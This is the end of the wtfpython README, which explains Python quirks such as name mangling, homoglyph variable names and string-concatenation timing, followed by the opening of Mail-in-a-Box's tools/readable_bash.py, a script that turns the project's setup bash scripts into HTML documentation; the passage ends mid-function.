>>> Ellipsis Ellipsis ``` #### 💡 Explanation - In Python, `Ellipsis` is a globally available built-in object which is equivalent to `...`. ```py >>> ... Ellipsis ``` - Ellipsis can be used for several purposes, + As a placeholder for code that hasn't been written yet (just like `pass` statement) + In slicing syntax to represent the full slices in remaining direction ```py >>> import numpy as np >>> three_dimensional_array = np.arange(8).reshape(2, 2, 2) array([ [ [0, 1], [2, 3] ], [ [4, 5], [6, 7] ] ]) ``` So our `three_dimensional_array` is an array of array of arrays. Let's say we want to print the second element (index `1`) of all the innermost arrays, we can use Ellipsis to bypass all the preceding dimensions ```py >>> three_dimensional_array[:,:,1] array([[1, 3], [5, 7]]) >>> three_dimensional_array[..., 1] # using Ellipsis. array([[1, 3], [5, 7]]) ``` Note: this will work for any number of dimensions. You can even select slice in first and last dimension and ignore the middle ones this way (`n_dimensional_array[firs_dim_slice, ..., last_dim_slice]`) + In [type hinting](https://docs.python.org/3/library/typing.html) to indicate only a part of the type (like `(Callable[..., int]` or `Tuple[str, ...]`)) + You may also use Ellipsis as a default function argument (in the cases when you want to differentiate between the "no argument passed" and "None value passed" scenarios). --- ### ▶ Inpinity <!-- Example ID: ff473ea8-a3b1-4876-a6f0-4378aff790c1 ---> The spelling is intended. Please, don't submit a patch for this. **Output (Python 3.x):** ```py >>> infinity = float('infinity') >>> hash(infinity) 314159 >>> hash(float('-inf')) -314159 ``` #### 💡 Explanation: - Hash of infinity is 10⁵ x π. - Interestingly, the hash of `float('-inf')` is "-10⁵ x π" in Python 3, whereas "-10⁵ x e" in Python 2. --- ### ▶ Let's mangle <!-- Example ID: 37146d2d-9e67-43a9-8729-3c17934b910c ---> 1\. ```py class Yo(object): def __init__(self): self.__honey = True self.bro = True ``` **Output:** ```py >>> Yo().bro True >>> Yo().__honey AttributeError: 'Yo' object has no attribute '__honey' >>> Yo()._Yo__honey True ``` 2\. ```py class Yo(object): def __init__(self): # Let's try something symmetrical this time self.__honey__ = True self.bro = True ``` **Output:** ```py >>> Yo().bro True >>> Yo()._Yo__honey__ Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'Yo' object has no attribute '_Yo__honey__' ``` Why did `Yo()._Yo__honey` work? 3\. ```py _A__variable = "Some value" class A(object): def some_func(self): return __variable # not initialized anywhere yet ``` **Output:** ```py >>> A().__variable Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'A' object has no attribute '__variable' >>> A().some_func() 'Some value' ``` #### 💡 Explanation: * [Name Mangling](https://en.wikipedia.org/wiki/Name_mangling) is used to avoid naming collisions between different namespaces. * In Python, the interpreter modifies (mangles) the class member names starting with `__` (double underscore a.k.a "dunder") and not ending with more than one trailing underscore by adding `_NameOfTheClass` in front. * So, to access `__honey` attribute in the first snippet, we had to append `_Yo` to the front, which would prevent conflicts with the same name attribute defined in any other class. * But then why didn't it work in the second snippet? Because name mangling excludes the names ending with double underscores. * The third snippet was also a consequence of name mangling. The name `__variable` in the statement `return __variable` was mangled to `_A__variable`, which also happens to be the name of the variable we declared in the outer scope. * Also, if the mangled name is longer than 255 characters, truncation will happen. --- --- ## Section: Appearances are deceptive! ### ▶ Skipping lines? <!-- Example ID: d50bbde1-fb9d-4735-9633-3444b9d2f417 ---> **Output:** ```py >>> value = 11 >>> valuе = 32 >>> value 11 ``` Wut? **Note:** The easiest way to reproduce this is to simply copy the statements from the above snippet and paste them into your file/shell. #### 💡 Explanation Some non-Western characters look identical to letters in the English alphabet but are considered distinct by the interpreter. ```py >>> ord('е') # cyrillic 'e' (Ye) 1077 >>> ord('e') # latin 'e', as used in English and typed using standard keyboard 101 >>> 'е' == 'e' False >>> value = 42 # latin e >>> valuе = 23 # cyrillic 'e', Python 2.x interpreter would raise a `SyntaxError` here >>> value 42 ``` The built-in `ord()` function returns a character's Unicode [code point](https://en.wikipedia.org/wiki/Code_point), and different code positions of Cyrillic 'e' and Latin 'e' justify the behavior of the above example. --- ### ▶ Teleportation <!-- Example ID: edafe923-0c20-4315-b6e1-0c31abfc38f5 ---> ```py # `pip install numpy` first. import numpy as np def energy_send(x): # Initializing a numpy array np.array([float(x)]) def energy_receive(): # Return an empty numpy array return np.empty((), dtype=np.float).tolist() ``` **Output:** ```py >>> energy_send(123.456) >>> energy_receive() 123.456 ``` Where's the Nobel Prize? #### 💡 Explanation: * Notice that the numpy array created in the `energy_send` function is not returned, so that memory space is free to reallocate. * `numpy.empty()` returns the next free memory slot without reinitializing it. This memory spot just happens to be the same one that was just freed (usually, but not always). --- ### ▶ Well, something is fishy... <!-- Example ID: cb6a37c5-74f7-44ca-b58c-3b902419b362 ---> ```py def square(x): """ A simple function to calculate the square of a number by addition. """ sum_so_far = 0 for counter in range(x): sum_so_far = sum_so_far + x return sum_so_far ``` **Output (Python 2.x):** ```py >>> square(10) 10 ``` Shouldn't that be 100? **Note:** If you're not able to reproduce this, try running the file [mixed_tabs_and_spaces.py](/mixed_tabs_and_spaces.py) via the shell. #### 💡 Explanation * **Don't mix tabs and spaces!** The character just preceding return is a "tab", and the code is indented by multiple of "4 spaces" elsewhere in the example. * This is how Python handles tabs: > First, tabs are replaced (from left to right) by one to eight spaces such that the total number of characters up to and including the replacement is a multiple of eight <...> * So the "tab" at the last line of `square` function is replaced with eight spaces, and it gets into the loop. * Python 3 is kind enough to throw an error for such cases automatically. **Output (Python 3.x):** ```py TabError: inconsistent use of tabs and spaces in indentation ``` --- --- ## Section: Miscellaneous ### ▶ `+=` is faster <!-- Example ID: bfd19c60-a807-4a26-9598-4912b86ddb36 ---> ```py # using "+", three strings: >>> timeit.timeit("s1 = s1 + s2 + s3", setup="s1 = ' ' * 100000; s2 = ' ' * 100000; s3 = ' ' * 100000", number=100) 0.25748300552368164 # using "+=", three strings: >>> timeit.timeit("s1 += s2 + s3", setup="s1 = ' ' * 100000; s2 = ' ' * 100000; s3 = ' ' * 100000", number=100) 0.012188911437988281 ``` #### 💡 Explanation: + `+=` is faster than `+` for concatenating more than two strings because the first string (example, `s1` for `s1 += s2 + s3`) is not destroyed while calculating the complete string. --- ### ▶ Let's make a giant string! <!-- Example ID: c7a07424-63fe-4504-9842-8f3d334f28fc ---> ```py def add_string_with_plus(iters): s = "" for i in range(iters): s += "xyz" assert len(s) == 3*iters def add_bytes_with_plus(iters): s = b"" for i in range(iters): s += b"xyz" assert len(s) == 3*iters def add_string_with_format(iters): fs = "{}"*iters s = fs.format(*(["xyz"]*iters)) assert len(s) == 3*iters def add_string_with_join(iters): l = [] for i in range(iters): l.append("xyz") s = "".join(l) assert len(s) == 3*iters def convert_list_to_string(l, iters): s = "".join(l) assert len(s) == 3*iters ``` **Output:** ```py # Executed in ipython shell using %timeit for better readability of results. # You can also use the timeit module in normal python shell/scriptm=, example usage below # timeit.timeit('add_string_with_plus(10000)', number=1000, globals=globals()) >>> NUM_ITERS = 1000 >>> %timeit -n1000 add_string_with_plus(NUM_ITERS) 124 µs ± 4.73 µs per loop (mean ± std. dev. of 7 runs, 100 loops each) >>> %timeit -n1000 add_bytes_with_plus(NUM_ITERS) 211 µs ± 10.5 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_string_with_format(NUM_ITERS) 61 µs ± 2.18 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_string_with_join(NUM_ITERS) 117 µs ± 3.21 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> l = ["xyz"]*NUM_ITERS >>> %timeit -n1000 convert_list_to_string(l, NUM_ITERS) 10.1 µs ± 1.06 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) ``` Let's increase the number of iterations by a factor of 10. ```py >>> NUM_ITERS = 10000 >>> %timeit -n1000 add_string_with_plus(NUM_ITERS) # Linear increase in execution time 1.26 ms ± 76.8 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_bytes_with_plus(NUM_ITERS) # Quadratic increase 6.82 ms ± 134 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_string_with_format(NUM_ITERS) # Linear increase 645 µs ± 24.5 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n1000 add_string_with_join(NUM_ITERS) # Linear increase 1.17 ms ± 7.25 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> l = ["xyz"]*NUM_ITERS >>> %timeit -n1000 convert_list_to_string(l, NUM_ITERS) # Linear increase 86.3 µs ± 2 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) ``` #### 💡 Explanation - You can read more about [timeit](https://docs.python.org/3/library/timeit.html) or [%timeit](https://ipython.org/ipython-doc/dev/interactive/magics.html#magic-timeit) on these links. They are used to measure the execution time of code pieces. - Don't use `+` for generating long strings — In Python, `str` is immutable, so the left and right strings have to be copied into the new string for every pair of concatenations. If you concatenate four strings of length 10, you'll be copying (10+10) + ((10+10)+10) + (((10+10)+10)+10) = 90 characters instead of just 40 characters. Things get quadratically worse as the number and size of the string increases (justified with the execution times of `add_bytes_with_plus` function) - Therefore, it's advised to use `.format.` or `%` syntax (however, they are slightly slower than `+` for very short strings). - Or better, if already you've contents available in the form of an iterable object, then use `''.join(iterable_object)` which is much faster. - Unlike `add_bytes_with_plus` because of the `+=` optimizations discussed in the previous example, `add_string_with_plus` didn't show a quadratic increase in execution time. Had the statement been `s = s + "x" + "y" + "z"` instead of `s += "xyz"`, the increase would have been quadratic. ```py def add_string_with_plus(iters): s = "" for i in range(iters): s = s + "x" + "y" + "z" assert len(s) == 3*iters >>> %timeit -n100 add_string_with_plus(1000) 388 µs ± 22.4 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each) >>> %timeit -n100 add_string_with_plus(10000) # Quadratic increase in execution time 9 ms ± 298 µs per loop (mean ± std. dev. of 7 runs, 100 loops each) ``` - So many ways to format and create a giant string are somewhat in contrast to the [Zen of Python](https://www.python.org/dev/peps/pep-0020/), according to which, > There should be one-- and preferably only one --obvious way to do it. --- ### ▶ Slowing down `dict` lookups * <!-- Example ID: c9c26ce6-df0c-47f7-af0b-966b9386d4c3 ---> ```py some_dict = {str(i): 1 for i in range(1_000_000)} another_dict = {str(i): 1 for i in range(1_000_000)} ``` **Output:** ```py >>> %timeit some_dict['5'] 28.6 ns ± 0.115 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each) >>> some_dict[1] = 1 >>> %timeit some_dict['5'] 37.2 ns ± 0.265 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each) >>> %timeit another_dict['5'] 28.5 ns ± 0.142 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each) >>> another_dict[1] # Trying to access a key that doesn't exist Traceback (most recent call last): File "<stdin>", line 1, in <module> KeyError: 1 >>> %timeit another_dict['5'] 38.5 ns ± 0.0913 ns per loop (mean ± std. dev. of 7 runs, 10000000 loops each) ``` Why are same lookups becoming slower? #### 💡 Explanation: + CPython has a generic dictionary lookup function that handles all types of keys (`str`, `int`, any object ...), and a specialized one for the common case of dictionaries composed of `str`-only keys. + The specialized function (named `lookdict_unicode` in CPython's [source](https://github.com/python/cpython/blob/522691c46e2ae51faaad5bbbce7d959dd61770df/Objects/dictobject.c#L841)) knows all existing keys (including the looked-up key) are strings, and uses the faster & simpler string comparison to compare keys, instead of calling the `__eq__` method. + The first time a `dict` instance is accessed with a non-`str` key, it's modified so future lookups use the generic function. + This process is not reversible for the particular `dict` instance, and the key doesn't even have to exist in the dictionary. That's why attempting a failed lookup has the same effect. ### ▶ Bloating instance `dict`s * <!-- Example ID: fe706ab4-1615-c0ba-a078-76c98cbe3f48 ---> ```py import sys class SomeClass: def __init__(self): self.some_attr1 = 1 self.some_attr2 = 2 self.some_attr3 = 3 self.some_attr4 = 4 def dict_size(o): return sys.getsizeof(o.__dict__) ``` **Output:** (Python 3.8, other Python 3 versions may vary a little) ```py >>> o1 = SomeClass() >>> o2 = SomeClass() >>> dict_size(o1) 104 >>> dict_size(o2) 104 >>> del o1.some_attr1 >>> o3 = SomeClass() >>> dict_size(o3) 232 >>> dict_size(o1) 232 ``` Let's try again... In a new interpreter: ```py >>> o1 = SomeClass() >>> o2 = SomeClass() >>> dict_size(o1) 104 # as expected >>> o1.some_attr5 = 5 >>> o1.some_attr6 = 6 >>> dict_size(o1) 360 >>> dict_size(o2) 272 >>> o3 = SomeClass() >>> dict_size(o3) 232 ``` What makes those dictionaries become bloated? And why are newly created objects bloated as well? #### 💡 Explanation: + CPython is able to reuse the same "keys" object in multiple dictionaries. This was added in [PEP 412](https://www.python.org/dev/peps/pep-0412/) with the motivation to reduce memory usage, specifically in dictionaries of instances - where keys (instance attributes) tend to be common to all instances. + This optimization is entirely seamless for instance dictionaries, but it is disabled if certain assumptions are broken. + Key-sharing dictionaries do not support deletion; if an instance attribute is deleted, the dictionary is "unshared", and key-sharing is disabled for all future instances of the same class. + Additionally, if the dictionary keys have been resized (because new keys are inserted), they are kept shared *only* if they are used by a exactly single dictionary (this allows adding many attributes in the `__init__` of the very first created instance, without causing an "unshare"). If multiple instances exist when a resize happens, key-sharing is disabled for all future instances of the same class: CPython can't tell if your instances are using the same set of attributes anymore, and decides to bail out on attempting to share their keys. + A small tip, if you aim to lower your program's memory footprint: don't delete instance attributes, and make sure to initialize all attributes in your `__init__`! ### ▶ Minor Ones * <!-- Example ID: f885cb82-f1e4-4daa-9ff3-972b14cb1324 ---> * `join()` is a string operation instead of list operation. (sort of counter-intuitive at first usage) **💡 Explanation:** If `join()` is a method on a string, then it can operate on any iterable (list, tuple, iterators). If it were a method on a list, it'd have to be implemented separately by every type. Also, it doesn't make much sense to put a string-specific method on a generic `list` object API. * Few weird looking but semantically correct statements: + `[] = ()` is a semantically correct statement (unpacking an empty `tuple` into an empty `list`) + `'a'[0][0][0][0][0]` is also semantically correct, because Python doesn't have a character data type like other languages branched from C. So selecting a single character from a string returns a single-character string. + `3 --0-- 5 == 8` and `--5 == 5` are both semantically correct statements and evaluate to `True`. * Given that `a` is a number, `++a` and `--a` are both valid Python statements but don't behave the same way as compared with similar statements in languages like C, C++, or Java. ```py >>> a = 5 >>> a 5 >>> ++a 5 >>> --a 5 ``` **💡 Explanation:** + There is no `++` operator in Python grammar. It is actually two `+` operators. + `++a` parses as `+(+a)` which translates to `a`. Similarly, the output of the statement `--a` can be justified. + This StackOverflow [thread](https://stackoverflow.com/questions/3654830/why-are-there-no-and-operators-in-python) discusses the rationale behind the absence of increment and decrement operators in Python. * You must be aware of the Walrus operator in Python. But have you ever heard about *the space-invader operator*? ```py >>> a = 42 >>> a -=- 1 >>> a 43 ``` It is used as an alternative incrementation operator, together with another one ```py >>> a +=+ 1 >>> a >>> 44 ``` **💡 Explanation:** This prank comes from [Raymond Hettinger's tweet](https://twitter.com/raymondh/status/1131103570856632321?lang=en). The space invader operator is actually just a malformatted `a -= (-1)`. Which is equivalent to `a = a - (- 1)`. Similar for the `a += (+ 1)` case. * Python has an undocumented [converse implication](https://en.wikipedia.org/wiki/Converse_implication) operator. ```py >>> False ** False == True True >>> False ** True == False True >>> True ** False == True True >>> True ** True == True True ``` **💡 Explanation:** If you replace `False` and `True` by 0 and 1 and do the maths, the truth table is equivalent to a converse implication operator. ([Source](https://github.com/cosmologicon/pywat/blob/master/explanation.md#the-undocumented-converse-implication-operator)) * Since we are talking operators, there's also `@` operator for matrix multiplication (don't worry, this time it's for real). ```py >>> import numpy as np >>> np.array([2, 2, 2]) @ np.array([7, 8, 8]) 46 ``` **💡 Explanation:** The `@` operator was added in Python 3.5 keeping the scientific community in mind. Any object can overload `__matmul__` magic method to define behavior for this operator. * From Python 3.8 onwards you can use a typical f-string syntax like `f'{some_var=}` for quick debugging. Example, ```py >>> some_string = "wtfpython" >>> f'{some_string=}' "some_string='wtfpython'" ``` * Python uses 2 bytes for local variable storage in functions. In theory, this means that only 65536 variables can be defined in a function. However, python has a handy solution built in that can be used to store more than 2^16 variable names. The following code demonstrates what happens in the stack when more than 65536 local variables are defined (Warning: This code prints around 2^18 lines of text, so be prepared!): ```py import dis exec(""" def f(): """ + """ """.join(["X" + str(x) + "=" + str(x) for x in range(65539)])) f() print(dis.dis(f)) ``` * Multiple Python threads won't run your *Python code* concurrently (yes, you heard it right!). It may seem intuitive to spawn several threads and let them execute your Python code concurrently, but, because of the [Global Interpreter Lock](https://wiki.python.org/moin/GlobalInterpreterLock) in Python, all you're doing is making your threads execute on the same core turn by turn. Python threads are good for IO-bound tasks, but to achieve actual parallelization in Python for CPU-bound tasks, you might want to use the Python [multiprocessing](https://docs.python.org/3/library/multiprocessing.html) module. * Sometimes, the `print` method might not print values immediately. For example, ```py # File some_file.py import time print("wtfpython", end="_") time.sleep(3) ``` This will print the `wtfpython` after 3 seconds due to the `end` argument because the output buffer is flushed either after encountering `\n` or when the program finishes execution. We can force the buffer to flush by passing `flush=True` argument. * List slicing with out of the bounds indices throws no errors ```py >>> some_list = [1, 2, 3, 4, 5] >>> some_list[111:] [] ``` * Slicing an iterable not always creates a new object. For example, ```py >>> some_str = "wtfpython" >>> some_list = ['w', 't', 'f', 'p', 'y', 't', 'h', 'o', 'n'] >>> some_list is some_list[:] # False expected because a new object is created. False >>> some_str is some_str[:] # True because strings are immutable, so making a new object is of not much use. True ``` * `int('١٢٣٤٥٦٧٨٩')` returns `123456789` in Python 3. In Python, Decimal characters include digit characters, and all characters that can be used to form decimal-radix numbers, e.g. U+0660, ARABIC-INDIC DIGIT ZERO. Here's an [interesting story](https://chris.improbable.org/2014/8/25/adventures-in-unicode-digits/) related to this behavior of Python. * You can separate numeric literals with underscores (for better readability) from Python 3 onwards. ```py >>> six_million = 6_000_000 >>> six_million 6000000 >>> hex_address = 0xF00D_CAFE >>> hex_address 4027435774 ``` * `'abc'.count('') == 4`. Here's an approximate implementation of `count` method, which would make the things more clear ```py def count(s, sub): result = 0 for i in range(len(s) + 1 - len(sub)): result += (s[i:i + len(sub)] == sub) return result ``` The behavior is due to the matching of empty substring(`''`) with slices of length 0 in the original string. --- --- # Contributing A few ways in which you can contribute to wtfpython, - Suggesting new examples - Helping with translation (See [issues labeled translation](https://github.com/satwikkansal/wtfpython/issues?q=is%3Aissue+is%3Aopen+label%3Atranslation)) - Minor corrections like pointing out outdated snippets, typos, formatting errors, etc. - Identifying gaps (things like inadequate explanation, redundant examples, etc.) - Any creative suggestions to make this project more fun and useful Please see [CONTRIBUTING.md](/CONTRIBUTING.md) for more details. Feel free to create a new [issue](https://github.com/satwikkansal/wtfpython/issues/new) to discuss things. PS: Please don't reach out with backlinking requests, no links will be added unless they're highly relevant to the project. # Acknowledgements The idea and design for this collection were initially inspired by Denys Dovhan's awesome project [wtfjs](https://github.com/denysdovhan/wtfjs). The overwhelming support by Pythonistas gave it the shape it is in right now. #### Some nice Links! * https://www.youtube.com/watch?v=sH4XF6pKKmk * https://www.reddit.com/r/Python/comments/3cu6ej/what_are_some_wtf_things_about_python * https://sopython.com/wiki/Common_Gotchas_In_Python * https://stackoverflow.com/questions/530530/python-2-x-gotchas-and-landmines * https://stackoverflow.com/questions/1011431/common-pitfalls-in-python * https://www.python.org/doc/humor/ * https://github.com/cosmologicon/pywat#the-undocumented-converse-implication-operator * https://github.com/wemake-services/wemake-python-styleguide/search?q=wtfpython&type=Issues * WFTPython discussion threads on [Hacker News](https://news.ycombinator.com/item?id=21862073) and [Reddit](https://www.reddit.com/r/programming/comments/edsh3q/what_the_fck_python_30_exploring_and/). # 🎓 License [![WTFPL 2.0][license-image]][license-url] &copy; [Satwik Kansal](https://satwikkansal.xyz) [license-url]: http://www.wtfpl.net [license-image]: https://img.shields.io/badge/License-WTFPL%202.0-lightgrey.svg?style=flat-square ## Surprise your friends as well! If you like wtfpython, you can use these quick links to share it with your friends, [Twitter](https://twitter.com/intent/tweet?url=https://github.com/satwikkansal/wtfpython&text=If%20you%20really%20think%20you%20know%20Python,%20think%20once%20more!%20Check%20out%20wtfpython&hashtags=python,wtfpython) | [Linkedin](https://www.linkedin.com/shareArticle?url=https://github.com/satwikkansal&title=What%20the%20f*ck%20Python!&summary=If%20you%20really%20thing%20you%20know%20Python,%20think%20once%20more!) | [Facebook](https://www.facebook.com/dialog/share?app_id=536779657179021&display=page&href=https%3A%2F%2Fgithub.com%2Fsatwikkansal%2Fwtfpython&quote=If%20you%20really%20think%20you%20know%20Python%2C%20think%20once%20more!) ## Need a pdf version? I've received a few requests for the pdf (and epub) version of wtfpython. You can add your details [here](https://form.jotform.com/221593245656057) to get them as soon as they are finished. **That's all folks!** For upcoming content like this, you can add your email [here](https://form.jotform.com/221593598380062).
mailinabox
ca123515aad102327701b18a7d65d180f800b815
File: tools/mail.py #!/bin/bash # This script has moved. management/cli.py "$@" File: tools/readable_bash.py #!/usr/bin/python3 # # Generate documentation for how this machine works by # parsing our bash scripts! import cgi, re import markdown from modgrammar import * def generate_documentation(): print("""<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width"> <title>Build Your Own Mail Server From Scratch</title> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap-theme.min.css"> <style> @import url(https://fonts.googleapis.com/css?family=Iceland); @import url(https://fonts.googleapis.com/css?family=Raleway:400,700); @import url(https://fonts.googleapis.com/css?family=Ubuntu:300,500); body { font-family: Raleway, sans-serif; font-size: 16px; color: #555; } h2, h3 { margin-top: .25em; margin-bottom: .75em; } p { margin-bottom: 1em; } .intro p { margin: 1.5em 0; } li { margin-bottom: .33em; } .sourcefile { padding-top: 1.5em; padding-bottom: 1em; font-size: 90%; text-align: right; } .sourcefile a { color: red; } .instructions .row.contd { border-top: 1px solid #E0E0E0; } .prose { padding-top: 1em; padding-bottom: 1em; } .terminal { background-color: #EEE; padding-top: 1em; padding-bottom: 1em; } ul { padding-left: 1.25em; } pre { color: black; border: 0; background: none; font-size: 100%; } div.write-to { margin: 0 0 1em .5em; } div.write-to p { padding: .5em; margin: 0; } div.write-to .filename { padding: .25em .5em; background-color: #666; color: white; font-family: monospace; font-weight: bold; } div.write-to .filename span { font-family: sans-serif; font-weight: normal; } div.write-to pre { margin: 0; padding: .5em; border: 1px solid #999; border-radius: 0; font-size: 90%; } pre.shell > div:before { content: "$ "; color: #666; } </style> </head> <body> <div class="container"> <div class="row intro"> <div class="col-xs-12"> <h1>Build Your Own Mail Server From Scratch</h1> <p>Here&rsquo;s how you can build your own mail server from scratch.</p> <p>This document is generated automatically from <a href="https://mailinabox.email">Mail-in-a-Box</a>&rsquo;s setup script <a href="https://github.com/mail-in-a-box/mailinabox">source code</a>.</p> <hr> </div> </div> <div class="container instructions"> """) parser = Source.parser() with open("setup/start.sh", "r") as start_file: for line in start_file: try: fn = parser.parse_string(line).filename() except: continue if fn in ("setup/start.sh", "setup/preflight.sh", "setup/questions.sh", "setup/firstuser.sh", "setup/management.sh"): continue import sys print(fn, file=sys.stderr) print(BashScript.parse(fn)) print(""" <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.10.1/jquery.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js"></script> <script> $(function() { $('.terminal').each(function() { $(this).outerHeight( $(this).parent().innerHeight() ); }); }) </script> </body> </html> """) class HashBang(Grammar): grammar = (L('#!'), REST_OF_LINE, EOL) def value(self): return "" def strip_indent(s): s = s.replace("\t", " ") lines = s.split("\n") try: min_indent = min(len(re.match(r"\s*", line).group(0)) for line in lines if len(line) > 0) except ValueError: # No non-empty lines. min_indent = 0 lines = [line[min_indent:] for line in lines] return "\n".join(lines) class Comment(Grammar): grammar = ONE_OR_MORE(ZERO_OR_MORE(SPACE), L('#'), REST_OF_LINE, EOL) def value(self): if self.string.replace("#", "").strip() == "": return "\n" lines = [x[2].string for x in self[0]] content = "\n".join(lines) content = strip_indent(content) return markdown.markdown(content, output_format="html4") + "\n\n" FILENAME = WORD('a-z0-9-/.') class Source(Grammar): grammar = ((L('.') | L('source')), L(' '), FILENAME, Comment | EOL) def filename(self): return self[2].string.strip() def value(self): return BashScript.parse(self.filename()) class CatEOF(Grammar): grammar = (ZERO_OR_MORE(SPACE), L('cat '), L('>') | L('>>'), L(' '), ANY_EXCEPT(WHITESPACE), L(" <<"), OPTIONAL(SPACE), L("EOF"), EOL, REPEAT(ANY, greedy=False), EOL, L("EOF"), EOL) def value(self): content = self[9].string content = re.sub(r"\\([$])", r"\1", content) # un-escape bash-escaped characters return "<div class='write-to'><div class='filename'>%s <span>(%s)</span></div><pre>%s</pre></div>\n" \ % (self[4].string, "overwrite" if ">>" not in self[2].string else "append to", cgi.escape(content)) class HideOutput(Grammar): grammar = (L("hide_output "), REF("BashElement")) def value(self): return self[1].value() class EchoLine(Grammar): grammar = (OPTIONAL(SPACE), L("echo "), REST_OF_LINE, EOL) def value(self): if "|" in self.string or ">" in self.string: return "<pre class='shell'><div>" + recode_bash(self.string.strip()) + "</div></pre>\n" return "" class EditConf(Grammar): grammar = ( L('tools/editconf.py '), FILENAME, SPACE, OPTIONAL((LIST_OF( L("-w") | L("-s") | L("-c ;"), sep=SPACE, ), SPACE)), REST_OF_LINE, OPTIONAL(SPACE), EOL ) def value(self): conffile = self[1] options = [] eq = "=" if self[3] and "-s" in self[3].string: eq = " " for opt in re.split("\s+", self[4].string): k, v = opt.split("=", 1) v = re.sub(r"\n+", "", fixup_tokens(v)) # not sure why newlines are getting doubled options.append("%s%s%s" % (k, eq, v)) return "<div class='write-to'><div class='filename'>" + self[1].string + " <span>(change settings)</span></div><pre>" + "\n".join(cgi.escape(s) for s in options) + "</pre></div>\n" class CaptureOutput(Grammar): grammar = OPTIONAL(SPACE), WORD("A-Za-z_"), L('=$('), REST_OF_LINE, L(")"), OPTIONAL(L(';')), EOL def value(self): cmd = self[3].string cmd = cmd.replace("; ", "\n") return "<div class='write-to'><div class='filename'>$" + self[1].string + "=</div><pre>" + cgi.escape(cmd) + "</pre></div>\n" class SedReplace(Grammar): grammar = OPTIONAL(SPACE), L('sed -i "s/'), OPTIONAL(L('^')), ONE_OR_MORE(WORD("-A-Za-z0-9 #=\\{};.*$_!()")), L('/'), ONE_OR_MORE(WORD("-A-Za-z0-9 #=\\{};.*$_!()")), L('/"'), SPACE, FILENAME, EOL def value(self): return "<div class='write-to'><div class='filename'>edit<br>" + self[8].string + "</div><p>replace</p><pre>" + cgi.escape(self[3].string.replace(".*", ". . .")) + "</pre><p>with</p><pre>" + cgi.escape(self[5].string.replace("\\n", "\n").replace("\\t", "\t")) + "</pre></div>\n" class EchoPipe(Grammar): grammar = OPTIONAL(SPACE), L("echo "), REST_OF_LINE, L(' | '), REST_OF_LINE, EOL def value(self): text = " ".join("\"%s\"" % s for s in self[2].string.split(" ")) return "<pre class='shell'><div>echo " + recode_bash(text) + " \<br> | " + recode_bash(self[4].string) + "</div></pre>\n" def shell_line(bash): return "<pre class='shell'><div>" + recode_bash(bash.strip()) + "</div></pre>\n" class AptGet(Grammar): grammar = (ZERO_OR_MORE(SPACE), L("apt_install "), REST_OF_LINE, EOL) def value(self): return shell_line("apt-get install -y " + re.sub(r"\s+", " ", self[2].string)) class UfwAllow(Grammar): grammar = (ZERO_OR_MORE(SPACE), L("ufw_allow "), REST_OF_LINE, EOL) def value(self): return shell_line("ufw allow " + self[2].string) class UfwLimit(Grammar): grammar = (ZERO_OR_MORE(SPACE), L("ufw_limit "), REST_OF_LINE, EOL) def value(self): return shell_line("ufw limit " + self[2].string) class RestartService(Grammar): grammar = (ZERO_OR_MORE(SPACE), L("restart_service "), REST_OF_LINE, EOL) def value(self): return shell_line("service " + self[2].string + " restart") class OtherLine(Grammar): grammar = (REST_OF_LINE, EOL) def value(self): if self.string.strip() == "": return "" if "source setup/functions.sh" in self.string: return "" if "source /etc/mailinabox.conf" in self.string: return "" return "<pre class='shell'><div>" + recode_bash(self.string.strip()) + "</div></pre>\n" class BashElement(Grammar): grammar = Comment | CatEOF | EchoPipe | EchoLine | HideOutput | EditConf | SedReplace | AptGet | UfwAllow | UfwLimit | RestartService | OtherLine def value(self): return self[0].value() # Make some special characters to private use Unicode code points. bash_special_characters1 = { "\n": "\uE000", " ": "\uE001", } bash_special_characters2 = { "$": "\uE010", } bash_escapes = { "n": "\uE020", "t": "\uE021", } def quasitokenize(bashscript): # Make a parse of bash easier by making the tokenization easy. newscript = "" quote_mode = None escape_next = False line_comment = False subshell = 0 for c in bashscript: if line_comment: # We're in a comment until the end of the line. newscript += c if c == '\n': line_comment = False elif escape_next: # Previous character was a \. Normally the next character # comes through literally, but escaped newlines are line # continuations and some escapes are for special characters # which we'll recode and then turn back into escapes later. if c == "\n": c = " " elif c in bash_escapes: c = bash_escapes[c] newscript += c escape_next = False elif c == "\\": # Escaping next character. escape_next = True elif quote_mode is None and c in ('"', "'"): # Starting a quoted word. quote_mode = c elif c == quote_mode: # Ending a quoted word. quote_mode = None elif quote_mode is not None and quote_mode != "EOF" and c in bash_special_characters1: # Replace special tokens within quoted words so that they # don't interfere with tokenization later. newscript += bash_special_characters1[c] elif quote_mode is None and c == '#': # Start of a line comment. newscript += c line_comment = True elif quote_mode is None and c == ';' and subshell == 0: # End of a statement. newscript += "\n" elif quote_mode is None and c == '(': # Start of a subshell. newscript += c subshell += 1 elif quote_mode is None and c == ')': # End of a subshell. newscript += c subshell -= 1 elif quote_mode is None and c == '\t': # Make these just spaces. if newscript[-1] != " ": newscript += " " elif quote_mode is None and c == ' ': # Collapse consecutive spaces. if newscript[-1] != " ": newscript += " " elif c in bash_special_characters2: newscript += bash_special_characters2[c] else: # All other 